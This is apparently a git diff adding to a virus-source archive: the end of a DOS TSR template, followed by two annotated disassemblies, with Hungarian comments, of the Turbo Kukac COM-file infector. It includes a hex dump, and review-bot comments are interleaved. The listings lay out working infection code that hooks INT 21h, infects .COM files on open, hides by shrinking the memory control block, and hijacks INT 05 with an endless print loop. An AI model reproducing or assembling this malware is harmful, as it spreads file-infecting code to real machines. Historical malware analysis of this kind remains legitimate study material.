+ Cmp Cs:MenuOn,0 + Je Get_Bios_Data + Iret + +Get_Bios_Data: + Mov Cs:MenuOn,1 + Sti + Push Ds + Push Ax + Mov Ax,Bios_Data + Mov Ds,Ax + Assume Ds:Bios_Data + Mov Ax,Low_Timer + Mov Cs:This_time,Ax + Mov Ax,Kbd_Status + Push Cs + Pop Ds + Assume Ds:Code +Chk_Keys: + And Ax,Hot_Keys + Cmp Ax,Hot_Keys + Jne Back_to_Applic +Chk_Timer: + Mov Ax,This_Time + Cmp Ax,Trig_Time + Jb Time_is_Right + Sub Ax,Trig_Time + Sub Ax,Delay_Count + Jnc Time_is_Right + +Back_to_Applic: + Pop Ax + Pop Ds + Mov Cs:MenuOn,0 + Iret + +Time_is_Right: + Mov Ax,This_Time + Mov Trig_Time,Ax + Pop Ax + Pop Ds + +;*************************************************************************** +; This is the Start of the application-dependent resident code + +Start_Program: + Mov Cs:MenuOn,1 + Push Ax + Push Bx + Push Cx + Push Dx + Push Si + Push Di + Push Bp + Push Ds + Push Es + + Push Cs + Pop Ds + + Mov Ax,3524h + Int 21h + Mov Int_24_Off,Bx + Mov Int_24_Seg,Es + Mov Ax,2524h + Mov Dx,Offset Diverted_Int24 + Int 21h + +;**************************************************************************** + +; Insert your program here. 
+ +;**************************************************************************** + +Restore_Int24: + Lds Dx,Int_24_Vect + Mov Ax,2524h + Int 21h + Pop Es + Pop Ds + Pop Bp + Pop Di + Pop Si + Pop Dx + Pop Cx + Pop Bx + Pop Ax + Mov Cs:MenuOn,0 + Mov Cs:Already8,0 + Iret + +; This is the end off the applicant-dependent resident code + + End_of_Res Label word + +;*************************************************************************** +; Installation + +Install: + Mov Ax,Cs + Mov Ds,Ax + Mov Es,Ax + + Mov Ah,9 + Mov Dx,OffSet CopyRight + Int 21h + +; Make sure that it is at least Dos 2.00 + Mov Ah,30h + Int 21h + Or Al,Al + Jnz Chk_Vectors + Mov Dx,Offset BadDos_Msg + Mov Ah,9 + Int 21h + Int 20h + +; See if resident code is already Installed in Memory + +Chk_Vectors: + Mov Ax,Cs + Mov Ds,Ax + Mov Es,Ax + + Mov Ax,3508h + Int 21h + Cmp Word Ptr [Es:Bx-6],'Al' + Jne Not_Installed1 + Cmp Word Ptr [Es:Bx-4],'ro' + Jne Not_Installed1 + Cmp Word Ptr [Es:Bx-2],'ge' + Jne Not_Installed1 + + Mov Dx,Offset No_Install_Msg + Mov Ah,9 + Int 21h + Mov Ax,4C01h + Int 21h + +Not_Installed1: + Mov Ax,3577h + Int 21h + Mov Ax,Es + Cmp Ax,'Al' + Jne Not_Installed + Cmp Bx,'ro' + Jne Not_Installed + + Mov Dx,Offset No_Install_Msg + Mov Ah,9 + Int 21h + Mov Ax,4C01h + Int 21h + +Not_Installed: + Mov Ax,Cs + Mov Ds,Ax + Mov Es,Ax + + Push Es + Mov Ax,Cs + Mov Ds,Ax + Mov Es,Ax + + Mov Ah,34h + Int 21h + Mov Dos_Busy_Off,Bx + Mov Dos_Busy_Seg,Es + + Mov Ax,3508h + Int 21h + Mov Int_8_Off,Bx + Mov Int_8_Seg,Es + + Mov Ax,Cs + Mov Es,Ax + Mov Ds,Ax + + Mov Ax,2508h + Mov Dx,Offset Diverted_Int8 + Int 21h + + Mov Ax,'Al' + Mov Ds,Ax + Mov Dx,'ro' + Mov Ax,2577h + Int 21h + Mov Ax,Cs + Mov Ds,Ax + + Mov Ax,3528h + Int 21h + Mov Int_28_Off,Bx + Mov Int_28_Seg,Es + Mov Ax,2528h + Mov Dx,Offset Diverted_Int28 + Int 21h + Pop Es + +; Terminate and stay resident + Mov Dx,Offset Install + Int 27h + +No_Install_Msg db 'xxxx is already in memory!',10,13,10,13,'$' +BadDos_Msg db 'DOS 2.0 or greater 
needed!',10,13,10,13,'$' +CopyRight db 'xxxx by ?????? - yyyy $' + +Code EndS + End Entry_Point + diff --git a/MSDOS/Virus.MSDOS.Unknown.turbo.asm b/MSDOS/Virus.MSDOS.Unknown.turbo.asm new file mode 100644 index 00000000..906cad16 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.turbo.asm 
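Review bot: The second "already installed" probe uses the INT 77h vector as a marker — `Not_Installed1` reads it with AX=3577h and the install writes `Mov Ax,'Al' / Mov Ds,Ax / Mov Dx,'ro' / Mov Ax,2577h`, i.e. it points INT 77h at 6C41h:6F72h. On AT-class machines the second 8259 maps IRQ 8–15 onto INT 70h–77h, so INT 77h is the IRQ 15 vector and the first such interrupt would vector into that garbage address; the INT 8 signature check just above (`Cmp Word Ptr [Es:Bx-6],'Al'` over `Res_ID1..3`) already answers the question, so the INT 77h probe and the `2577h` store should go. `Already8` is cleared (`Mov Cs:Already8,0`) but never read or set, so it is dead state. The timer path also calls INT 21h (AH=35h/25h) from inside the hardware interrupt after checking only the InDOS byte obtained via AH=34h; the conventional version of this scheme also checks the critical-error flag and defers to the INT 28h hook, which here is only a second entry into the same code.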
@@ -0,0 +1,324 @@ + @ virus unassembled list: + `90.07.21. + +Magyarzat: Kvri Lszl + Tel.: (41) 21-822 07-13:20 mh. + 21-033 18:00- + + +0EB0:0100 E80000 CALL 0103 +0EB0:0103 90 NOP +0EB0:0104 5E POP SI ;SI=IP bziscm +0EB0:0105 50 PUSH AX +0EB0:0106 51 PUSH CX +0EB0:0107 B82135 MOV AX,3521 +0EB0:010A CD21 INT 21 ;INT 21h cm lekrdezse +0EB0:010C 8CC0 MOV AX,ES +0EB0:010E 3D0040 CMP AX,4000 ;memriban vam ? +0EB0:0111 7220 JB 0133 ;nincs nem 4000h fl + ;mutat! +0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza +0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime +0EB0:0119 03F2 ADD SI,DX ;bzishoz +0EB0:011B 8B1C MOV BX,[SI] +0EB0:011D 8B4C02 MOV CX,[SI+02] +0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op. +0EB0:0124 890E0201 MOV [0102],CX ;visszaraksa +0EB0:0128 8CD8 MOV AX,DS +0EB0:012A 8EC0 MOV ES,AX ;ES=DS +0EB0:012C 59 POP CX +0EB0:012D 58 POP AX +0EB0:012E BB0001 MOV BX,0100 +0EB0:0131 FFE3 JMP BX ;ugrs 0100h-ra igy + ;lefut az eredeti prg. + ;Ha nincs a memriban +0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetejnek + ;paragrafuscme +0EB0:0136 2D0008 SUB AX,0800 +0EB0:0139 8EC0 MOV ES,AX ;virus j szegmens +0EB0:013B BF0001 MOV DI,0100 +0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. 
hossza +0EB0:0141 B90002 MOV CX,0200 ;virus mrete +0EB0:0144 F3 REPZ +0EB0:0145 A4 MOVSB ;virus msolsa az + ;j szegmensbe +0EB0:0146 8C06F200 MOV [00F2],ES ;j szegmenscm +0EB0:014A B95501 MOV CX,0155 ;j szegmensben a be- + ;lpsi offset-je +0EB0:014D 890EF000 MOV [00F0],CX +0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugrs az j seg.:0155 + + ;belpsi pont +0EB0:0155 8CC1 MOV CX,ES +0EB0:0157 8CD8 MOV AX,DS +0EB0:0159 26 ES: +0EB0:015A A38C02 MOV [028C],AX ;rgi seg (eredeti + ;program) +0EB0:015D B80001 MOV AX,0100 +0EB0:0160 26 ES: +0EB0:0161 A38A02 MOV [028A],AX ;0100h offset +0EB0:0164 8CC0 MOV AX,ES +0EB0:0166 8ED8 MOV DS,AX ;DS=j seg +0EB0:0168 B82135 MOV AX,3521 +0EB0:016B CD21 INT 21 ;INT 21h lekrdezse +0EB0:016D 2E CS: +0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset +0EB0:0172 8CC3 MOV BX,ES +0EB0:0174 2E CS: +0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment +0EB0:0179 B8A501 MOV AX,01A5 ;j INT 21h offset +0EB0:017C 8BD0 MOV DX,AX +0EB0:017E 8BC1 MOV AX,CX +0EB0:0180 8ED8 MOV DS,AX +0EB0:0182 B82125 MOV AX,2521 +0EB0:0185 CD21 INT 21 ;INT 21h ellopsa +0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op. +0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus +0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg. +0EB0:0192 8ED8 MOV DS,AX +0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op. +0EB0:0198 890E0201 MOV [0102],CX ;visszaraksa +0EB0:019C 8EC0 MOV ES,AX +0EB0:019E 59 POP CX +0EB0:019F 58 POP AX +0EB0:01A0 2E CS: +0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugrs az eredeti + ;programra + + ;j INT 21h rutin +0EB0:01A5 90 NOP +0EB0:01A6 80FC3D CMP AH,3D ;file nyits ? +0EB0:01A9 7403 JZ 01AE ;igen +0EB0:01AB E9C000 JMP 026E ;ugrs az eredeti + ;INT 21h-ra +0EB0:01AE 1E PUSH DS +0EB0:01AF 06 PUSH ES +0EB0:01B0 50 PUSH AX +0EB0:01B1 53 PUSH BX +0EB0:01B2 51 PUSH CX +0EB0:01B3 52 PUSH DX +0EB0:01B4 57 PUSH DI +0EB0:01B5 56 PUSH SI + + ;Ellenrzi hogy COM file-e + +0EB0:01B6 8BFA MOV DI,DX ;Filespec. 
+0EB0:01B8 8CDE MOV SI,DS +0EB0:01BA 8EC6 MOV ES,SI +0EB0:01BC B000 MOV AL,00 +0EB0:01BE B93200 MOV CX,0032 +0EB0:01C1 FC CLD +0EB0:01C2 F2 REPNZ +0EB0:01C3 AE SCASB ;PATH lemsolsa +0EB0:01C4 83EF03 SUB DI,+03 +0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba +0EB0:01CA 26 ES: +0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ? +0EB0:01CD 7403 JZ 01D2 ;igen +0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra +0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be +0EB0:01D5 26 ES: +0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ? +0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file! +0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra +0EB0:01DE B43D MOV AH,3D ;file nyitsa +0EB0:01E0 B002 MOV AL,02 ;rs/olvass +0EB0:01E2 E89000 CALL 0275 ;INT 21h hivsa +0EB0:01E5 7303 JNB 01EA ;ha nincs hiba +0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra + + ;File mret ellenrzs + +0EB0:01E9 90 NOP +0EB0:01EA 8BD8 MOV BX,AX ;kezel +0EB0:01EC B90000 MOV CX,0000 +0EB0:01EF BA0000 MOV DX,0000 +0EB0:01F2 B80242 MOV AX,4202 ;file vgre poz. +0EB0:01F5 E87D00 CALL 0275 ;INT 21h hivsa +0EB0:01F8 3D00FE CMP AX,FE00 +0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra + + ;Eredeti 4 byte beolvassa (JMP+operandusa) + +0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza +0EB0:0200 2E CS: +0EB0:0201 A38102 MOV [0281],AX +0EB0:0204 B80042 MOV AX,4200 ;file elejre poz. +0EB0:0207 B90000 MOV CX,0000 +0EB0:020A BA0000 MOV DX,0000 +0EB0:020D E86500 CALL 0275 ;INT 21h hivsa +0EB0:0210 B43F MOV AH,3F ;olvass +0EB0:0212 B90400 MOV CX,0004 ;4 byte +0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa +0EB0:0218 8CCF MOV DI,CS +0EB0:021A 8EDF MOV DS,DI ;DS=CS +0EB0:021C E85600 CALL 0275 ;INT 21h hivsa +0EB0:021F B005 MOV AL,05 +0EB0:0221 3A068902 CMP AL,[0289] +0EB0:0225 743F JZ 0266 + + ;Virusra mutat JMP+op bersa a programba + +0EB0:0227 B80042 MOV AX,4200 ;file elejre poz. 
+0EB0:022A B90000 MOV CX,0000 +0EB0:022D 8BD1 MOV DX,CX +0EB0:022F E84300 CALL 0275 ;INT 21h hivsa +0EB0:0232 B0E9 MOV AL,E9 ;JMP kdja +0EB0:0234 2E CS: +0EB0:0235 A28002 MOV [0280],AL ;leteszi +0EB0:0238 B005 MOV AL,05 +0EB0:023A 2E CS: +0EB0:023B A28302 MOV [0283],AL +0EB0:023E B90400 MOV CX,0004 ;4 byte +0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete +0EB0:0244 0E PUSH CS +0EB0:0245 1F POP DS +0EB0:0246 B440 MOV AH,40 ;kirs +0EB0:0248 E82A00 CALL 0275 ;INT 21h hivsa + + ;1C0h byte kirsa FERTZS! + +0EB0:024B B80242 MOV AX,4202 ;file vgre poz. +0EB0:024E B90000 MOV CX,0000 +0EB0:0251 8BD1 MOV DX,CX +0EB0:0253 E81F00 CALL 0275 ;INT 21h hivsa +0EB0:0256 BA0001 MOV DX,0100 ;0100h -tl +0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte +0EB0:025C B440 MOV AH,40 ;kirsa +0EB0:025E E81400 CALL 0275 ;INT 21h hivsa + + ;Ffertztt file zrsa + +0EB0:0261 B43E MOV AH,3E +0EB0:0263 E80F00 CALL 0275 ;INT 21h hivsa +0EB0:0266 5E POP SI +0EB0:0267 5F POP DI +0EB0:0268 5A POP DX +0EB0:0269 59 POP CX +0EB0:026A 5B POP BX +0EB0:026B 58 POP AX +0EB0:026C 07 POP ES +0EB0:026D 1F POP DS +0EB0:026E 90 NOP +0EB0:026F 2E CS: +0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugrs az eredeti + ;INT 21h-ra +0EB0:0274 CF IRET + + ;Eredeti INT 21h hivsa +0EB0:0275 9C PUSHF ;IRET miatt! 
+0EB0:0276 2E CS: +0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hivsa +0EB0:027B C3 RET + +0EB0:027C 16 PUSH SS +0EB0:027D 130C ADC CX,[SI] +0EB0:027F 02E9 ADD CH,CL +0EB0:0281 1C00 SBB AL,00 +0EB0:0283 050101 ADD AX,0101 +0EB0:0286 EB12 JMP 029A +0EB0:0288 90 NOP +0EB0:0289 49 DEC CX +0EB0:028A 0001 ADD [BX+DI],AL +0EB0:028C DD0A ESC 29,[BP+SI][BP+SI] +0EB0:028E 0A0D OR CL,[DI] +0EB0:0290 9A6476206D CALL 6D20:7664 +0EB0:0295 69 DB 69 +0EB0:0296 6E DB 6E +0EB0:0297 64 DB 64 +0EB0:0298 65 DB 65 +0EB0:0299 6E DB 6E +0EB0:029A 206E61 AND [BP+61],CH +0EB0:029D 67 DB 67 +0EB0:029E 7974 JNS 0314 +0EB0:02A0 7564 JNZ 0306 +0EB0:02A2 A073A3 MOV AL,[A373] +0EB0:02A5 6E DB 6E +0EB0:02A6 61 DB 61 +0EB0:02A7 6B DB 6B +0EB0:02A8 2120 AND [BX+SI],SP +0EB0:02AA 54 PUSH SP +0EB0:02AB 7572 JNZ 031F +0EB0:02AD 62 DB 62 +0EB0:02AE 6F DB 6F +0EB0:02AF 204020 AND [BX+SI+20],AL +0EB0:02B2 2E CS: +0EB0:02B3 2E CS: +0EB0:02B4 2E CS: +0EB0:02B5 202E2E2E AND [2E2E],CH +0EB0:02B9 201A AND [BP+SI],BL +0EB0:02BB 0000 ADD [BX+SI],AL +0EB0:02BD 0000 ADD [BX+SI],AL +0EB0:02BF 005374 ADD [BP+DI+74],DL +0EB0:02C2 20E8 AND AL,CH +0EB0:02C4 4E DEC SI +0EB0:02C5 01E9 ADD CX,BP +0EB0:02C7 51 PUSH CX +0EB0:02C8 FF2EC606 JMP FAR [06C6] +0EB0:02CC 050006 ADD AX,0600 +0EB0:02CF 2E CS: +0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010 +0EB0:02D6 EB7B JMP 0353 +0EB0:02D8 90 NOP +0EB0:02D9 2E CS: +0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A +0EB0:02E0 EB71 JMP 0353 +0EB0:02E2 90 NOP +0EB0:02E3 2E CS: +0EB0:02E4 FE060600 INC BYTE PTR [0006] +0EB0:02E8 56 PUSH SI +0EB0:02E9 8BF3 MOV SI,BX +0EB0:02EB 83C302 ADD BX,+02 +0EB0:02EE 3E DS: +0EB0:02EF 8B7202 MOV SI,[BP+SI+02] +0EB0:02F2 2E CS: +0EB0:02F3 803E060000 CMP BYTE PTR [0006],00 +0EB0:02F8 750A JNZ 0304 +0EB0:02FA AC LODSB +0EB0:02FB 3C00 CMP AL,00 +0EB0:02FD 743B JZ 033A +0EB0:02FF E80F03 CALL 0611 + + + Megjegyzs: + + Nincs kros hatsa. 
Megoldsa kitn, hiszen mg egy system + info lekrse esetn sem kkisebb a DOS lltal ltott mem- + ria mret, mint a fizikai RAM mret! + +DUMP + +0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=. +0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L. +0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX.. +0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-......... +0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U.... +0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&...... +0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!... +0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........ +0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!......... +0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX +0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t...... +0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2 +0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t.. +0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....= +0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}....... +0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-.. +0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e. +0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V.. +0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B...... +0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C............... +0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B.. +0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@.. +0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X.... +0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|...... 
+0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I...... +0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt +0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo +0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ...... +0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........ +0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........ +0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>. +0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;. +0EB0:0300 0F . + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.turbo99.asm b/MSDOS/Virus.MSDOS.Unknown.turbo99.asm new file mode 100644 index 00000000..a288e8e7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.turbo99.asm 
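Review bot: The install path at 0133h–0145h (`MOV AX,[0002] / SUB AX,0800 / MOV ES,AX` followed by a 200h-byte `REPZ MOVSB`) copies the resident body to 32K below the PSP's top-of-memory word without allocating or reserving that region, and `MOV AX,2521` then points INT 21h at it; the closing note that no memory-map tool can see it is true precisely because nothing protects it, so the next program large enough to use that area overwrites the handler and a later INT 21h will most likely crash the machine. The residency test `CMP AX,4000 / JB 0133` is only a heuristic on the current INT 21h segment: any other handler living above 4000h makes the virus assume it is resident and skip installation, while a vector below 4000h causes the body to be re-copied and INT 21h re-hooked on every run of an infected file. Since this hunk is a DEBUG unassembly rather than source, the Hungarian commentary should be translated and the "Nincs káros hatása" (no harmful effect) verdict qualified with the memory-clobbering above.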
@@ -0,0 +1,426 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +TURBO KUKAC v9.9 virus unassembled list: + `90.07.21. + +Magyarzat: Kvri Lszl + Tel.: (41) 21-822 07-13:20 mh. + 21-033 18:00- + + + +28F8:0100 E80000 CALL 0103 ;IP rtke az SI-be +28F8:0103 90 NOP ;ez lesz a bzis offset +28F8:0104 5E POP SI +28F8:0105 50 PUSH AX +28F8:0106 51 PUSH CX +28F8:0107 B021 MOV AL,21 +28F8:0109 B435 MOV AH,35 +28F8:010B CD21 INT 21 ;INT 21h cmnek lekr- + ;dezse +28F8:010D 8CC0 MOV AX,ES +28F8:010F 3D0040 CMP AX,4000 ;a memriban van ? +28F8:0112 7224 JB 0138 ;nincs! +28F8:0114 83EE03 SUB SI,+03 ;bzis offset -3 + ;(3 byte hosszu a JMP + ;+ az operandusa!) +28F8:0117 BAC102 MOV DX,02C1 +28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levonsa + ;(COM file sajtossga!) 
+28F8:011E 03F2 ADD SI,DX +28F8:0120 8B1C MOV BX,[SI] ;JMP kdja + az operan- + ;dus fele +28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte +28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet +28F8:0129 890E0201 MOV [0102],CX ;letrolsa +28F8:012D 8CD8 MOV AX,DS +28F8:012F 8EC0 MOV ES,AX ;ES=DS +28F8:0131 59 POP CX +28F8:0132 58 POP AX +28F8:0133 BB0001 MOV BX,0100 ;ugrs offset-je +28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM VGRE- + ;HAJTSA + + ;HA MG NINCS A MEMRIBAN +28F8:0138 8CD8 MOV AX,DS ;sajt szegmense +28F8:013A 48 DEC AX ;sajt seg-1= MCB. seg. +28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense +28F8:013D A10300 MOV AX,[0003] ;DOS lltal a programnak + ;foglalt memriablokk + ;hossza +28F8:0140 2D4100 SUB AX,0041 ;virus hosszt levonja + ;belle (41*16 byte) +28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS + ;lltal ltott teljes + ;memria nagysga a prg. + ;kilpse utn (41*16 + ;byte-tal) kevesebb lesz + ;Hasonlan csinlja ezt + ;a YANKEE DOODLE is, s + ;ezzel azt ri el, hogy + ;semmilyen + ;System Storage Map + ;programmal nem mutat- + ;hat ki a virus jele- + ;lte a memriban! + ;A PCTOOLS system info + ;kimutatja, azaz csak + ;annyit ltni, hogy a + ;fizikai RAM mret 640K + ;s a DOS lltal ltott + ;az 639k byte! Igy k- + ;vetkeztetni lehet... 
+28F8:0146 8CC8 MOV AX,CS +28F8:0148 8ED8 MOV DS,AX ;DS=CS +28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej- + ;nek a paragrafuscme +28F8:014D 2D0008 SUB AX,0800 +28F8:0150 8EC0 MOV ES,AX ;virus j szegmense +28F8:0152 BF0001 MOV DI,0100 +28F8:0155 83EE03 SUB SI,+03 +28F8:0158 B90002 MOV CX,0200 ;virus hossza +28F8:015B F3 REPZ +28F8:015C A4 MOVSB ;virus msolsa az j + ;szegmensbe +28F8:015D 8C06C702 MOV [02C7],ES ;j szegmens trolsa +28F8:0161 B96C01 MOV CX,016C ;belpsi pont +28F8:0164 890EC502 MOV [02C5],CX ;trolsa +28F8:0168 FF2EC502 JMP FAR [02C5] ;ugrs az j szegmens + ;01c6 offset-re + ;UJ SZEGMENSBEN A BELPSI PONT +28F8:016C 8CC1 MOV CX,ES +28F8:016E 8CD8 MOV AX,DS ;ahonnan msolta magt +28F8:0170 26 ES: +28F8:0171 A3CB02 MOV [02CB],AX ;RGI PRG. segment cm +28F8:0174 B80001 MOV AX,0100 +28F8:0177 26 ES: +28F8:0178 A3C902 MOV [02C9],AX ;0100h offset trolsa +28F8:017B 8CC0 MOV AX,ES +28F8:017D 8ED8 MOV DS,AX +28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY j + ;offset-je +28F8:0182 B005 MOV AL,05 +28F8:0184 B425 MOV AH,25 +28F8:0186 CD21 INT 21 ;INT 05 ellopsa +28F8:0188 B435 MOV AH,35 +28F8:018A B021 MOV AL,21 +28F8:018C CD21 INT 21 ;INT 21h cm lekrdez- + ;se +28F8:018E 2E CS: +28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (rgi) +28F8:0193 8CC3 MOV BX,ES +28F8:0195 2E CS: +28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (rgi) +28F8:019A B8D901 MOV AX,01D9 ;j INT 21h offset cm +28F8:019D 8BD0 MOV DX,AX +28F8:019F 8BC1 MOV AX,CX +28F8:01A1 8ED8 MOV DS,AX +28F8:01A3 B021 MOV AL,21 +28F8:01A5 B425 MOV AH,25 +28F8:01A7 CD21 INT 21 ;INT 21h ellopsa +28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ +28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!! +28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!! 
+28F8:01B4 8ED8 MOV DS,AX +28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP kdja +28F8:01BA 890E0201 MOV [0102],CX ;s operandusa +28F8:01BE 8EC0 MOV ES,AX +28F8:01C0 59 POP CX +28F8:01C1 58 POP AX +28F8:01C2 2E CS: +28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA- + ;TSA! + ;j INT 05 - HARD COPY rutin +28F8:01C7 90 NOP +28F8:01C8 50 PUSH AX +28F8:01C9 1E PUSH DS +28F8:01CA 52 PUSH DX +28F8:01CB 8CC8 MOV AX,CS +28F8:01CD 8ED8 MOV DS,AX + ;VGTELEN CIKLUS! +28F8:01CF BACE02 MOV DX,02CE ;szveg kezdete + ;Turbo Kukac v9.9 +28F8:01D2 B409 MOV AH,09 ;print string +28F8:01D4 E8D900 CALL 02B0 ;rgi INT 21h hivsa +28F8:01D7 EBF6 JMP 01CF ;jra! + + ;j INT 21h rutin +28F8:01D9 90 NOP +28F8:01DA 80FC3D CMP AH,3D ;file nyitsa alfunkci? +28F8:01DD 7403 JZ 01E2 ;igen +28F8:01DF E9C700 JMP 02A9 ;nem ugrsa az eredeti + ;INT 21h-ra +28F8:01E2 90 NOP +28F8:01E3 1E PUSH DS +28F8:01E4 06 PUSH ES +28F8:01E5 50 PUSH AX +28F8:01E6 53 PUSH BX +28F8:01E7 51 PUSH CX +28F8:01E8 52 PUSH DX +28F8:01E9 57 PUSH DI +28F8:01EA 56 PUSH SI + + ;File kiterjeszts ellenrzse + +28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete +28F8:01ED 8CDE MOV SI,DS +28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH + ;tvtele!) +28F8:01F1 B000 MOV AL,00 ;PATH lezr nulla +28F8:01F3 B93200 MOV CX,0032 ;file secifikci hossza +28F8:01F6 FC CLD ;elre +28F8:01F7 F2 REPNZ +28F8:01F8 AE SCASB ;PATH lezr 0 byte ke- + ;resse +28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszts + ;kezdet+1 pozicira mu- + ;tat +28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be +28F8:01FF 26 ES: +28F8:0200 3B05 CMP AX,[DI] ; 'OM' a vge ? +28F8:0202 7403 JZ 0207 ;igen valszinleg COM + ;file 